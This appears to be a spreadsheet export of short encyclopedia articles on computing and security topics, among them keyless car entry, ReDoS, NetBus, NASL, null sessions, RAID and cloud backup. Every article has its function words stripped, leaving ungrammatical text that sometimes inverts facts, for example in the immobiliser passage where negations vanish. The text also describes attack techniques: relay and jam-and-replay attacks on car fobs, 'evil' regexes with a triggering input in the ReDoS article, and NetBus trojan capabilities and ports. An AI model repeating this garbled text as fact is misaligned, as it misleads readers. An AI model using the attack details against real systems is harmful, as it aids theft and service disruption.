    <t>remote keyless system (rks), also called keyless entry remote central locking, electronic lock controls access building vehicle using electronic remote control (activated handheld device automatically proximity).widely used automobiles, performs functions standard without physical contact. when within yards car, pressing button remote lock unlock doors, perform functions. remote keyless system include remote keyless entry (rke), unlocks doors, remote keyless ignition (rki), starts engine. history first introductions 1980 ford thunderbird, mercury cougar, lincoln continental mark lincoln town car, ford called keyless entry system (later renamed securicode). keypad driver-side exterior door door handle. consisted keypad five buttons code entered, would unlock driver's door, subsequent code entries unlock doors, trunk. nissan offered technology nissan maxima nissan fairlady beginning 1984, essentially using approach ford, addition able roll windows open optional moonroof outside vehicle door handle installed keypad driver's front passengers door. remote keyless systems using handheld transmitter first began appearing french made renault fuego 1982, option several american motors vehicles 1983, including renault alliance. feature gained first widespread availability u.s. several general motors vehicles 1989. function keyless remotes contain short-range radio transmitter, must within certain range, usually 5–20 meters, work. when button pushed, sends coded signal radio waves receiver unit car, locks unlocks door. most rkes operate frequency north america-made cars 433.92 european, japanese asian cars. modern systems since mid-1990s implement encryption well rotating entry codes prevent thieves intercepting spoofing signal. earlier systems used infrared instead radio signals unlock vehicle, systems found mercedes-benz, manufacturers. system signals either locked unlocked usually fairly discreet combination flashing vehicle lamps, distinctive sound horn, usage horn itself. typical setup cars horn sound chirp twice signify unlocked, chirp indicate locked. example, toyota, scion, lexus chirp system signify locked/unlocked. while beeps means driver's door unlocked, four beeps means doors unlocked. long beep trunk power tailgate. short beep signifies locked alarm set. functions remote keyless entry system contained built ignition handle itself. buttons dedicated locking unlocking doors opening trunk tailgate. minivans, power sliding doors opened/closed remotely. some cars also close open windows roof remotely locking car. some remote keyless fobs also feature panic button activates alarm standard feature. further adding convenience, cars' engines remote keyless ignition systems started push button (useful cold weather), convertible tops raised lowered outside vehicle parked. cars trunk release electronically operated, triggered open button remote. conventionally, trunk springs open help hydraulic struts torsion springs, thereafter must lowered manually. premium models, suvs estates tailgates, motorized assist open close tailgate easy access remote operation. offices, residences, system also coupled security system, garage door opener remotely activated lighting devices. programming remote keyless entry fobs emit radio frequency designated, distinct digital identity code. inasmuch "programming" fobs proprietary technical process, typically performed automobile manufacturer. general, procedure computer 'programming mode'. this usually entails engaging power several times holding button lever. also include opening doors, removing fuses. procedure varies amongst various makes, models, years. once 'programming mode' buttons depressed send digital identity code car's onboard computer. computer saves code taken programming mode. fobs become prevalent automobile industry secondary market unprogrammed devices sprung some websites sell steps program fobs individual models cars well accessory kits remotely activate devices. early (1998–2012) keyless entry remotes, remotes individually programmed user, pressing button remote, starting vehicle. however, newer (2013+) keyless entry remotes require dealership locksmith programming computer special software infrared keyless entry systems offered user programming, though radio frequency keyless entry systems mostly require dealer programming. smart keys some cars proximity system triggered transponder within certain distance sometimes called hands-free advanced key. earliest systems found 1993 chevrolet corvette (called passive keyless entry system) mercedes-benz vehicles 1998.today, system commonly found variety vehicles, although exact method operation differs makes models, operation generally similar: vehicle unlocked without driver needing physically push button lock unlock also able start stop ignition without physically insert turning ignition. instead, vehicle senses (which located user's pocket, purse, etc.) approaching vehicle. simpler version smart system engine immobiliser, involving security system embedded modern vehicle's keys. small chip rests vehicle's plastic cover. when inserted ignition, ignition coded. sends security code ignition, also security code, security codes match, vehicle start turned. however, codes match, vehicle start turned. some early examples technology include chrysler corporation's sentry system, general motors's passkey system. some security keys programmed user, though keys programmed dealership locksmith computer. possible copy keys hardware store auto parts store, nowadays security keyless ignition default provide better security. october 2014, found insurers united kingdom would insure certain vehicles keyless ignition unless additional mechanical locks place weaknesses keyless system.news media reported cases suspected criminals managed open cars using signal boosters trick vehicles thinking keyless entry fobs close even away (relay attack), though reported devices found. articles speculate keeping fobs aluminum foil freezer prevent criminals exploiting vulnerability.in 2015, reported samy kamkar built inexpensive electronic device size wallet could concealed near locked vehicle capture single keyless entry code used later time unlock vehicle. device transmits jamming signal block vehicle's reception rolling code signals owner's fob, recording signals attempts needed unlock vehicle. recorded first code sent vehicle owner makes second attempt, recorded second code retained future use. kamkar stated vulnerability widely known years present many vehicle types previously undemonstrated. demonstration done 23.actual thefts targeting luxury cars based exploit reported near front home. several workaround prevent exploits, including placing box. criminal ring stole vehicles using technique southern eastern ontario.most keyless systems technique called rolling code avoid replay attacks, open command intercepted used thief later time. rolling code, pseudorandom number generator used generate different unlock sequence sent time unlocked. also near field communication ignition switch transponder references external links article keyless entry remote systems automobiles work requirements remote keyless entry (rke) systems false warning code thieves snopes.com</t>
  </si>
  <si>
    <t>ReCellular</t>
  </si>
  <si>
    <t>recellular recycler reseller cell phones, founded 1991. recellular collected cell phones resale recycling, collecting 125,000 phones week.recellular moved headquarters dexter, michigan arbor, michigan 2011, amid layoffs people. 2013, closed dexter facility filed receivership, form bankruptcy. reuse recycling approximately phones recellular collected reprogrammed sold reuse. phones successfully repaired, about half rebuilt phones domestic re-sellers, half developing countries africa, south america, asia. they typically sell $18, recellular's partners receive much phone charities choosing."obsolete non-functional phones passed sims recycling solutions dismantled recycled order reclaim valuable materials, gold, silver palladium circuit boards; copper wiring phone chargers; nickel, iron, cadmium lead battery packs; plastic cases accessories.in november 2006, magazine inc. named recellular green also electronic waste united states sims recycling solutions references external links mobile karma</t>
  </si>
  <si>
    <t>ReDoS</t>
  </si>
  <si>
    <t>regular expression denial service (redos) algorithmic complexity attack produces denial-of-service providing regular expression and/or input takes long time evaluate. attack exploits fact many regular expression implementations super-linear worst-case complexity; certain regex-input pairs, time taken grow polynomially exponentially relation input size. attacker thus cause program spend substantial time providing specially crafted regular expression and/or input. program slow becoming unresponsive. description regular expression ("regex") matching done building finite-state automaton. regex easily converted nondeterministic automata (nfas), state input symbol, several possible next states. after building automaton, several possibilities exist: engine convert deterministic finite-state automaton (dfa) input result; engine possible paths match found paths tried fail ("backtracking"). engine consider possible paths nondeterministic automaton parallel; engine convert nondeterministic automaton lazily (i.e., fly, match).of algorithms, first problematic. first problematic deterministic automaton could {\displaystyle 2^{m}} states {\displaystyle number states nondeterministic automaton; thus, conversion take exponential time. second problematic nondeterministic automaton could exponential number paths length {\displaystyle walking input length {\displaystyle also take exponential time. last algorithms, however, exhibit pathological behavior. note non-pathological regular expressions, problematic algorithms usually fast, practice, expect "compile" regex o(m) time match o(n) time; instead, simulation lazy computation o(m2n) worst-case complexity. regex denial service occurs expectations applied regex provided user, malicious regular expressions provided user trigger worst-case complexity regex matcher. while regex algorithms written efficient way, regex engines existence extend regex languages additional constructs cannot always solved efficiently. such extended patterns essentially force implementation regex programming languages backtracking. examples exponential backtracking severe type problem happens backtracking regular expression matches, patterns runtime exponential length input string. strings {\displaystyle characters, runtime {\displaystyle o(2^{n})} this happens regular expression three properties: regular expression applies repetition subexpression; subexpression match input multiple ways, subexpression match input string prefix longer possible match; repeated subexpression, expression matches something subexpression match.the second condition best explained examples: (a|a)+$, repetition applied subexpression a|a, match ways side alternation. (a+)*$, repetition applied subexpression match etc.in examples used match string, satisfying third condition, also possible another character this. example (a|aa)*c problematic structure. three regular expressions exhibit exponential runtime applied strings form {\displaystyle a...a!} example, match aaaaaaaaaaaaaaaaaaaaaaaa! backtracking expression engine, take significantly long time complete, runtime approximately double extra also possible backtracking polynomial time {\displaystyle o(n^{x})} instead exponential. this also cause problems long enough inputs, though less attention paid problem malicious input must much longer significant effect. example pattern "a*b?a*x", input arbitrarily long sequence "a"s. vulnerable regexes online repositories so-called "evil" vulnerable regexes found online regular expression repositories. note enough find vulnerable subexpression order attack full regex: regexlib, id=1757 (email validation) part^([a-za-z0-9])(([\-.]|[_]+)?([a-za-z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$ owasp validation regex repository, java classname part^(([a-z])+.)+[a-z]([a-z])+$these examples also susceptible input aaaaaaaaaaaaaaaaaaaaaaaa!. attacks regex affected user input, service permitting clients provide search pattern, attacker inject malicious regex consume server's resources. therefore, cases, regular expression denial service avoided removing possibility user execute arbitrary patterns server. case, applications databases main vulnerable applications. alternatively, malicious page could hang user's browser cause arbitrary amounts memory. however, vulnerable regex exists server-side already, attacker instead able provide input triggers worst-case behavior. case, e-mail scanners intrusion detection systems could also vulnerable. fortunately, cases, problematic regular expressions rewritten "non-evil" patterns. example, (.*a)+ rewritten ([^a]*a)+. case application, programmer regular expression validate input client server side system. attacker could inspect client code, looking evil regular expressions, send crafted input directly server order hang also denial-of-service attack cyberwarfare orbit cannon high orbit cannon references external links examples redos open source applications: redos datavault redos entlib redos nasd core.net terelik some benchmarks redos achim hoffman (2010). "redos benchmark regular expression javascript". retrieved 2010-04-19. richard smith (2010). "regular expression denial service (redos) attack test results". retrieved 2010-04-19. paper implementing regular expressions vulnerable certain classes redos russ (2007). "regular expression matching simple fast". retrieved 2011-04-20. tools detecting redos vulnerabilities thielecke, rathnayake (2013). "regular expression denial service (redos) static analysis". retrieved 2013-05-30. merwe, weideman (2017). "regex static analysis". retrieved 2017-08-12.</t>
  </si>
  <si>
    <t>Nwipe</t>
  </si>
  <si>
    <t>nwipe linux computer program used securely erase data. maintained martijn brummelen free software, released general public license licence. program fork dwipe program previously incorporated dban secure erase disk.nwipe created allow dwipe outside dban, using host distribution. utilizes simple text-based ncurses user interface directly command line available installable package repositories many linux distributions, including debian ubuntu.nwipe first released version 0.17 october 2014. erasing methods nwipe number different patterns, method selection: default short united states department defense 5220.22-m short pass wipe (passes zero fill fills device zeros, single pass. rcmp tssit ops-ii royal canadian mounted police technical security standard, ops-ii 5220.22m united states department defense 5220.22-m full pass wipe. gutmann wipe peter gutmann's method secure deletion data magnetic solid-state memory. prng stream fills device stream prng. verify only reads device checks zero. enhanced secure sanitation protectively marked information sensitive informationit uses types pseudo random number generators: mersenne twister isaac employment nwipe also incorporated free software rescue toolkit packages, system rescue toolkit, parted magic, shredos systemrescuecd. references external links official website</t>
  </si>
  <si>
    <t>Real-estate lock box</t>
  </si>
  <si>
    <t>real-estate lock padlock-shaped generally hangs around doorknob house market. device holds keys house allow communal access real estate agents, continuing keep secure. permission generally required seller, owner, install device door. lock boxes also used general storage security keys familial access. traditional real estate lock boxes secured either manual key, security code, swipe card, newer versions operate tandem mobile devices, incorporating logging remote control configuration. advances technology allows computer generated codes access keys lockbox. when buyers agent requests property, computer program send time code agent time entry. this advancement allows maximum security, nearly equivalent changing lock every time customer leaves. other locks mobile apps grant access upon arrival customer. also knox box—a type lock similar purpose used firefighters references</t>
  </si>
  <si>
    <t>Nessus Attack Scripting Language</t>
  </si>
  <si>
    <t>nessus attack scripting language, usually referred nasl, scripting language used vulnerability scanners like nessus openvas. with nasl specific attacks automated, based known vulnerabilities. tens thousands plugins written nasl nessus openvas. files written language usually file extension .nasl. exploitation zero attack possible user nessus openvas write custom code nasl executed vulnerability scanners. earlier versions nessus, binary called nasl nasl.exe provided could interpret nasl code perform vulnerability scans. later versions nessus, done provided software. example executing nasl plugin 'myzeroday.nasl' windows, command following could invoked: nasl.exe 127.0.0.1 "c:\temp\myzeroday.nasl" equivalent example linux unix command could look like this: nasl 127.0.0.1 /tmp/myzeroday.nasl plugin, example myzeroday.nasl, placed directory nasl plugins located, also included standard scans nessus openvas, api. many specifications formal language similar programming language scripting language perl languages. control flow loop, if-else statements part language comments preceded hash. example "hello world" nasl is:display("hello world\n"); release notes nessus 6.10.0 1/31/2017, nasl compiler faster plugins mentioned. references sources nessus network auditing, edition russ rogers, publisher: syngress release date: october 2011 isbn 9780080558653 chapter nasl using 'nasl' nessus command line tool nasl documentation basic structure nasl scripts adding third party nasl plugins openvas alexander leonov information security automation freebsd manual pages, manual reference pages openvas-nasl nessus, snort, ethereal power tools, noam rathaus, gilbert ramirez, beale, brian caswell, publisher: syngress 2005 isbn 9780080489421 chapter inner workings nasl (nessus attack scripting language)</t>
  </si>
  <si>
    <t>Rdiff-backup</t>
  </si>
  <si>
    <t>rdiff-backup backup software written python creates reverse incremental backups. recent backup thus directly accessible, earlier backups reconstructed diff files rdiff-backup. name implies, rdiff-backup uses rdiff method (more exactly, reimplementation rsync within librsync) compute differences file versions. rdiff-backup able back files across different machines ssh. usage backup normal operation rdiff-backup &lt;source directory&gt; &lt;backup directory&gt;. gzip compression increment files disabled --no-compression. options --print-statistics show backup's progress statistics. specifying --no-fsync disable fsync, causing significant speedup, elevated risk data loss. restoration files directories rdiff-backup --restore-as-of &lt;date&gt; &lt;backup&gt; &lt;source&gt; restore &lt;source&gt; entire backup, single file sub-directory. &lt;date&gt; specified several ways: date, example "2020-02-14" (which interpreted midnight question), datetime string like "2020-02-14t12:26:53+02:00" (which found running rdiff-backup --list-increments &lt;backup&gt; first) time span, example "1m" restore files month number backups, "10b" restore 10th most-recent version "now", restore recent backup.it also possible find relevant time-stamped file rdiff-backup-data/increments directory, rdiff-backup &lt;time-stamped file&gt; &lt;file folder restored&gt;. simpler (but always correctly, file permissions might properly restored), recent backup also restored copying back-upped file directory rsync deleted file recognizable suffix snapshot.gz also restored retrieving rdiff-backup-data/increments directory, copying source directory, unpacking gzip. deleting backups only oldest backups removed, rdiff-backup --remove-older-than &lt;date&gt; &lt;backup directory&gt;. ability delete oldest versions specific files directories) scheduled appear version 2.2. when deleting versions, &lt;date&gt; takes arguments restoring files directories (see above). problems version 2.0.0, rdiff-backup work exfat file systems, though ntfs supported. rdiff-backup recognizes changed files file size well modification time (mtime). make sure changed files back-upped, running rdiff-backup --compare-hash &lt;source directory&gt; &lt;backup directory&gt; rdiff-backup --compare-full &lt;source directory&gt; &lt;backup directory&gt; byte-wise comparison) display changed files. then, using touch, modification time problematic files reset now, thus, included next rdiff-backup run. external links official website rdiff-backup github page rdiff-backup</t>
  </si>
  <si>
    <t>Nested RAID levels</t>
  </si>
  <si>
    <t>nested raid levels, also known hybrid raid, combine standard raid levels (where "raid" stands "redundant array independent disks") gain performance, additional redundancy both, result combining properties different standard raid layouts.nested raid levels usually numbered using series numbers, commonly used levels numbers. first number numeric designation denotes lowest raid level "stack", rightmost denotes highest layered raid level; example, raid layers data striping raid distributed parity raid nested raid levels include raid raid raid 100, raid raid combine data striping raid techniques; result layering scheme, raid raid represent significantly different nested raid levels. raid (raid 0+1) raid also called raid 0+1, raid level using mirror stripes, achieving replication sharing data disks. usable capacity raid array raid array made drives, half drives used mirror half. {\displaystyle (n/2)\cdot s_{\mathrm {min} {\displaystyle total number drives {\displaystyle s_{\mathrm {min} capacity smallest drive array.at least four disks required standard raid configuration, larger arrays also used. raid (raid 0+3) raid also called raid sometimes raid similar raid exception byte-level striping dedicated parity used instead mirroring. raid (raid 1+0) raid also called raid sometimes raid 1&amp;0, similar raid exception used standard raid levels layered opposite order; thus, raid stripe mirrors.raid recognized storage industry association generally implemented raid controllers, raid array mirrors, two- three-way mirrors, requires minimum four drives. however, nonstandard definition "raid created linux driver; linux "raid implemented disks. implementations supporting disks linux raid offer choice layouts. arrays four disks also possible. according manufacturer specifications official independent benchmarks, cases raid provides better throughput latency raid levels except raid (which wins throughput). thus, preferable raid level i/o-intensive applications database, email, servers, well requiring high disk performance. raid (raid 5+0) raid also called raid 5+0, combines straight block-level striping raid distributed parity raid raid array striped across raid elements, minimal raid configuration requires drives. right example three collections raid striped together make total storage space. drive raid sets could fail without loss data; example, raid configuration including three raid sets tolerate three maximum potential simultaneous drive failures (but raid set). because reliability system depends quick replacement drive array rebuild, common include spares immediately start rebuilding array upon failure. however, address issue array maximum strain reading every rebuild array time vulnerable.raid improves upon performance raid particularly writes, provides better fault tolerance single raid level does. this level recommended applications require high fault tolerance, capacity random access performance. number drives raid increases, capacity drives increase, impacts fault-recovery time correspondingly interval rebuilding raid increases. raid (raid 6+0) raid also called raid 6+0, combines straight block-level striping raid distributed double parity raid resulting raid array striped across raid elements. requires least eight disks. raid (raid 10+0) raid 100, sometimes also called raid 10+0, stripe raid 10s. this logically equivalent wider raid array, generally implemented using software raid hardware raid being "striped ways", raid described "plaid raid". comparison following table provides overview considerations nested raid levels. case: space efficiency given expression terms number drives, expression designates fractional value zero one, representing fraction drives' capacities available use. example, three drives arranged raid gives array space efficiency 67%; thus, drive example capacity array total capacity capacity usable data storage sometimes necessary {\displaystyle place {\displaystyle inherent nature configuration raid 10). fault tolerance uses {\displaystyle representation, place {\displaystyle certain nested raid levels (see fault tolerance calculation). {\displaystyle number disks mirror, rather total number disks. fault tolerance number drive failures allowed, guaranteed number failures raid handle maximum possible without guaranteed failure. failure rate given expression terms number drives, {\displaystyle number disks {\displaystyle mirror, cases), drive failure rate, {\displaystyle (which assumed identical independent drive) seen bernoulli trial. example, three drives failure rate next three years, drives arranged raid gives array failure rate next three years 0.95 0.15 0.95 0.857375 0.135375 0.00725 {\displaystyle {\begin{aligned}1-(1-r)^{n}-nr(1-r)^{n-1}&amp;=1-(1-5\%)^{3}-3\times 5\%\times (1-5\%)^{3-1}\\&amp;=1-0.95^{3}-0.15\times 0.95^{2}\\&amp;=1-0.857375-0.135375\\&amp;=0.00725\\&amp;\approx 0.7\%\end{aligned}}} also non-raid drive architectures non-standard raid levels explanatory notes references further reading "learning about raid". support.dell.com. dell. 2009. archived original 2009-02-20. retrieved 2016-04-15.</t>
  </si>
  <si>
    <t>Null encryption</t>
  </si>
  <si>
    <t>modern cryptography, null encryption selecting null cipher none cipher) choosing encryption system various encryption options offered. when option used, text encryption, practical testing/debugging, authentication-only communication. mathematics function known identity function. examples "enull" "anull" cipher suite openssl, "null encryption algorithm" ipsec. also 2410: "the null encryption algorithm with ipsec" references</t>
  </si>
  <si>
    <t>NetBarrier X4</t>
  </si>
  <si>
    <t>netbarrier discontinued version intego netbarrier line firewall features cookie cleaner, browser history cleaner, internet traffic statistic, internet bandwidth meter, cookie filters information hiding. firewall customizable, already configured options: restrictions", network", "client (local server)", "server only", "client only", "customized". "customized" option allows flexible firewall configuration. netbarrier's features integrated virusbarrier longer sold standalone product. references http://www.intego.com/netbarrier/ http://www.macworld.com/article/50970/2006/05/netbarrierx4.html</t>
  </si>
  <si>
    <t>NetBus</t>
  </si>
  <si>
    <t>netbus netbus software program remotely controlling microsoft windows computer system network. created 1998 controversial potential used trojan horse.netbus written delphi carl-fredrik neikter, swedish programmer march 1998. wide circulation back orifice released, august 1998. author claimed program meant used pranks, illegally breaking computer systems. translated swedish, name means "netprank". however, netbus serious consequences. 1999, netbus used plant child pornography work computer scholar lund university. 3,500 images discovered system administrators, scholar assumed downloaded knowingly. lost research position faculty, following publication name fled country seek professional medical care cope stress. acquitted criminal charges late 2004, court found netbus used control computer.there components client–server architecture. server must installed computer remotely controlled. .exe file file size almost name icon varied version version. common names "patch.exe" "sysedit.exe". when started first time, server would install host computer, including modifying windows registry starts automatically system startup. server faceless process listening connections port 12345 versions, port number adjusted). port 12346 used tasks, well port 20034. client separate program presenting graphical user interface allowed user perform number activities remote computer. examples capabilities: keystroke logging keystroke injection screen captures program launching file browsing shutting system opening closing cd-tray tunneling protocol (netbus connections number systems.)the netbus client designed support following operating system versions: windows windows windows windows 4.0netbus client (v1.70) works fine windows 2000 windows well. major parts protocol, used client server interaction version 1.70) textual. thus server controlled typing human understandable commands connection. difficult using client application allows administrate computers netbus operating environments windows, original client available. features (such screen capture) require application ability accepting binary data, netcat. most common protocols (like internet relay chat protocol, pop3 smtp, http) also used connections similar way. netbus released february 1999. marketed commercially powerful remote administration tool. less stealthy, special hacked versions exist make possible illegal purposes. versions program widely used "script kiddies" popularized release back orifice. because smaller size, back orifice used gain access machine. attacker back orifice install netbus server target computer. most anti-virus programs detect remove netbus. references external links information netbus information anti-virus vendor f-secure. lxnb netbus client linux works netbus 1.60. 0.1b simple netbus client clean interface linux.</t>
  </si>
  <si>
    <t>Real-time recovery</t>
  </si>
  <si>
    <t>information technology, real-time recovery (rtr) ability recover piece infrastructure server infrastructure failure human-induced error time frame minimal impact business operations. real-time recovery focuses appropriate technology restores, thus reducing recovery time objective (rto) minutes, recovery point objectives (rpo) within minutes ago, minimizing test recovery objectives (tro), ability test validate backups occurred correctly without impacting production systems.real-time recovery market segment backup, recovery disaster recovery market addresses challenges companies historically faced regards protecting, importantly, recovering data. definition real-time recovery solution must contain minimum) following attributes: ability restore server minutes same, totally different virtual environment within minutes require additional agents, options modules accomplish this. must able restore files seconds (after all, reason anyone backups able restore). must perform sector level backups, every minutes ability self-heal broken incremental chain backups part image corrupted deleted. must deliver improved recoverability data files databases. classification data loss data loss classified three broad categories: server hardware failure preventing server failure difficult, possible take precautions avoid total server failure user redundant power supplies, raid disk sets. human error these disasters major reasons failure. human error intervention intentional unintentional cause massive failures loss entire systems data files. this category data loss includes accidental erasure, walkout, sabotage, burglary, virus, intrusion, etc. natural disasters acts terrorism although infrequent, companies weigh risk natural disasters acts terrorism. much data loss business willing able tolerate. platforms data servers data servers either physical hosts guest servers within virtualization platform, combination both. common customer environment mixture virtual physical servers. this attention detail must given approach protecting data servers regular intervals. there distinct advantages selecting technology virtual physical independent. this would limit number technologies organizations trained skilled purchase, deploy, manage maintain. ideal world, reduce complexity managing multiple products protect physical virtual infrastructure reap rewards. technology gets installed operating system level ensures consistency environment either physical virtual eliminates compatibility disk volume structure limitations (e.g. mapped devices, vmfs). strategies prior selecting real-time recovery strategy solution, disaster recovery planner refer organization's business continuity plan metrics recovery point objective (rpo) recovery time objective various business processes (such process payroll, generate order, e-mail, etc.). metrics specified business processes must mapped underlying systems infrastructure support processes. once recovery time objective recovery point objective metrics mapped infrastructure, planner determine suitable recovery strategy system. business ultimately sets budget, therefore metrics need available budget. while ideal zero data loss zero time loss, cost associated level protection historically made high-availability solutions impractical unaffordable. costs real-time recovery solution less previous tape-based backup systems. references</t>
  </si>
  <si>
    <t>NetIQ eDirectory</t>
  </si>
  <si>
    <t>edirectory x.500-compatible directory service software product netiq. previously owned novell, product also known novell directory services (nds) sometimes referred netware directory services. initially released novell 1993 netware replacing netware bindery mechanism used previous versions, centrally managing access resources multiple servers computers within given network. edirectory hierarchical, object oriented database used represent certain assets organization logical tree, including organizations, organizational units, people, positions, servers, volumes, workstations, applications, printers, services, groups name few. features edirectory uses dynamic rights inheritance, allows global specific access controls. access rights objects tree determined time request determined rights assigned objects virtue location tree, security equivalences, individual assignments. software supports partitioning point tree, well replication partition number servers. replication servers occurs periodically using deltas objects. each server master information holds (provided replica read only). additionally, replicas filtered include defined attributes increase speed (for example, replica configured include name phone number corporate address book, opposed entire directory user profile). software supports referential integrity, multi-master replication, modular authentication architecture. accessed ldap, dsml, soap, odbc, jdbc, jndi, adsi. supported platforms windows 2000 windows server 2003 windows server 2008 windows server 2012 suse linux enterprise server enterprise linux novell netware solaris hp-ux network configuration stored directory when novell first designed directory, decided store large amounts operational server data within directory addition user account information. result, typical novell directory contains large pool additional objects representing servers software services running servers, ldap email software. storage versions edirectory prior version (then called novell directory services) used record-based database management engine called recman, relied transaction tracking system built netware operating system. since version edirectory (along groupwise collaboration suite, starting version uses flaim (flexible adaptable information management) database engine. flaim open source embeddable database engine developed novell released license 2006. this change allowed ported platforms windows, linux, unix. further reading killpack, rick (2005). edirectory field guide. apress. isbn 978-1-59059-553-4. kuo, peter; henderson (2004). novell's guide troubleshooting edirectory. novell press. isbn 978-0-7897-3146-3. jeffrey hughes (2002). novells cross platform guide edirectory. john wiley sons. isbn 978-0-7645-4915-1. jeffrey hughes (2001). effective edirectory design proactive analysis. directory design. isbn 978-0-9717420-0-0. also list ldap software references external links netiq edirectory product page</t>
  </si>
  <si>
    <t>Null character</t>
  </si>
  <si>
    <t>Remote error indication</t>
  </si>
  <si>
    <t>remote error indication (rei) formerly block error (febe) alarm signal used synchronous optical networking (sonet). indicates transmitting node receiver detected block error. overview febe errors mostly seen circuits, however known present types (sonet/t1s etc.). each terminating device (router otherwise) monitors incoming signal cp-bit path errors. error detected incoming ds3, terminating elements transmit febe outgoing direction ds3. network monitoring equipment located anywhere along path measures febes direction gauge quality circuit service. running york atlanta, there's problem within central offices virginia. errors generated device central office, detected terminating device nid, router). terminating device sends 'febe' error signal outbound alert devices problems. errors generated incoming side loop, device terminating picks errors, transmits 'febe errors' message outgoing side. this specific setup error reporting causes confusion many technicians trying perform repairs. technical jargon: error detected extracting 4-bit febe field path status byte (g1). legal range 4-bit field 0000 1000, representing zero eight errors. value interpreted zero errors. ds-3 m-frame uses bits check line parity. m-subframe uses bits format called c-bit parity, copies result bits source checks result destination. interface reports detected c-bit parity errors back source far-end block error (febe). cisco.com rights reserved) indication sent transmitting node flawed block detected receiving node. (ds3) febe c-bit parity parity violation detected far-end terminal transmitted back near-end terminal. maintenance cell indicates error occurred data block link. this cell sends message back near end. references</t>
  </si>
  <si>
    <t>Null session</t>
  </si>
  <si>
    <t>null session anonymous connection inter-process communication network service windows-based computers. service designed allow named pipe connections used attackers remotely gather information system. exposure from null session, hackers call apis remote procedure calls enumerate information. these techniques can, provide information passwords, groups, services, users even active processors. null session access also even used escalating privileges perform attacks. references</t>
  </si>
  <si>
    <t>Remote backup service</t>
  </si>
  <si>
    <t>remote, online, managed backup service, sometimes marketed cloud backup backup-as-a-service, service provides users system backup, storage, recovery computer files. online backup providers companies provide type service users clients). such backup services considered form cloud computing. online backup systems typically built client software program runs given schedule. some systems day, usually night computers use. other newer cloud backup services continuously capture changes user systems nearly real-time. online backup system typically collects, compresses, encrypts, transfers data remote backup service provider's servers off-site hardware. there many products market offering different feature sets, service levels, types encryption. providers type service frequently target specific market segments. high-end lan-based backup systems offer services active directory, client remote control, open file backups. consumer online backup companies frequently beta software offerings and/or free-trial backup services fewer live support options. history mid-1980s, computer industry great state change modems speeds 1200 2400 baud, making transfers large amounts data slow minutes). while faster modems secure network protocols development, tape backup systems gained popularity. during period need affordable, reliable online backup system becoming clear, especially businesses critical data. more online/remote backup services came existence heyday dot-com boom late 1990s. initial years large industry service providers capturing market share understanding importance role online backup providers playing services arena. today, service providers online backup services position services using saas (software service) paas (platform service) strategy relevance predicted increase exponentially years come personal enterprise data storage needs rise. last years also witnessed healthy rise number independent online backup providers. characteristics service-based assurance, guarantee, validation backed recoverable whenever required critical. data stored service provider's cloud must undergo regular integrity validation ensure recoverability. cloud (backup restore) services need provide variety granularity comes rto's (recovery time objective). size either customers applications within customer's environment. customer never manage back storage repositories order back recover data. interface used customer needs enable selection data protect recover, establishment retention times, destruction dates well scheduling. cloud backup needs active process data collected systems store original copy. this means cloud backup require data copied specific appliance data collected transmitted stored service provider's data centre. ubiquitous access cloud utilizes standard networking protocols (which today primarily exclusively based) transfer data customer service provider. vaults repositories need always available restore data location connected service provider’s cloud private public networks. scalable elastic cloud enables flexible allocation storage capacity customers without limit. storage allocated demand also de-allocated customers delete backup sets age. cloud enables service provider allocate storage capacity customer. customer later deletes data longer needs capacity, service provider release reallocate capacity different customer automated fashion. metered cloud backup allows customers align value data cost protecting procured per-gigabyte month basis. prices tend vary based data, type data (email, databases, files etc.), volume, number backup copies rtos. shared secure underlying enabling technology cloud backup full stack native cloud multitenant platform (shared everything). data mobility/portability prevents service provider lock-in allows customers move data service provider another, entirely back dedicated private cloud hybrid cloud). security cloud critical. customer never access another’s data. additionally, even service providers must able access customer’s data without customer’s permission. enterprise-class cloud backup enterprise-class cloud backup solution must include on-premises cache, mitigate issues inconsistent internet connectivity.hybrid cloud backup works storing data local disk backup captured high speed, either backup software d2d2c (disk disk cloud) appliance encrypts transmits data service provider. this adds protection local disasters. recent backups retained locally, speed data recovery operations. there number cloud storage appliances market used backup target, including appliances ctera networks, storsimple twinstrata.hybrid cloud backup also beneficial enterprise users security concerns. when storing data locally sending cloud, backup users perform necessary encryption operations, incl. technologies like: data encryption cipher (aes 128, aes192, aes256 blowfish) windows encrypting file system (efs) verification files previously catalogued, permitting tripwire-like capability cram-md5 password authentication component (storage, client cloud) configurable (ssl) communications encryption component (storage, client cloud) computation sha1 signatures file data, configureddata encryption additionally applied choose public cloud service provider. important compression backup data. local backup cache used compress data sending cloud order lower network bandwidth load improve backup speed. this becomes critical enterprises backup huge databases like oracle huge files like virtual machine images mail server databases (edb files exchange). recent improvements availability allow increased software agents instead hardware appliances enterprise cloud backup. software-only approach offer advantages including decreased complexity, simple scalability, significant cost savings improved data recovery times. typical features encryption data encrypted sent across internet, stored encrypted state. encryption least bits, user option using encryption key, never sent server. network backup backup service supporting network backup back multiple computers, servers network attached storage appliances local area network single computer device. continuous backup continuous data protection allows service back continuously predefined schedule. both methods advantages disadvantages. most backup services schedule-based perform backups predetermined time. some services provide continuous data backups used large financial institutions large online retailers. however, typically trade-off performance system resources. file-by-file restore ability users restore files themselves, without assistance service provider allowing user select files name and/or folder. some services allow users select files searching filenames folder names, dates, file type, backup set, tags. online access files some services allow access backed-up files normal browser. many services provide type functionality. data compression data typically compressed lossless compression algorithm minimize amount bandwidth used. differential data compression minimize network traffic transfer binary data changed next, similar open source file transfer service rsync. more advanced online backup services method rather transfer entire files. bandwidth usage user-selectable option less bandwidth; possible change various times day. off-line backup off-line backup allows along part online backup solution cover daily backups time network connection down. time remote backup software must perform backup onto local media device like tape drive, disk another server. minute network connection restored remote backup software update remote datacenter changes coming off-line backup media synchronization many services support data synchronization allowing users keep consistent library files across many computers. technology help productivity increase access data. common features business users bulk restore restore data portable storage device full restore internet might take long. centralized management console allows department staff member monitor manage backups restores regular user. file retention policies many businesses require flexible file retention policy applied unlimited number groups files called "sets". fully managed services some services offer higher level support businesses might request immediate help, proactive monitoring, personal visits service provider, telephone support. redundancy multiple copies data backed different locations. this achieved mirrored data centers, keeping local copy latest version backed data site business. regulatory compliance some businesses required comply government regulations govern privacy, disclosure, legal discovery. service provider offers type service assists customers proper compliance understanding laws. seed loading ability send first backup portable storage device rather internet user large amounts data need quickly backed server backup many businesses require backups servers special applications databases them, groupware, sql, erp- crm-systems directory services. this requires regular file-based approach, specific point-in-time backups restores databases.versioning keeps multiple past versions files allow rollback restoration specific point time. 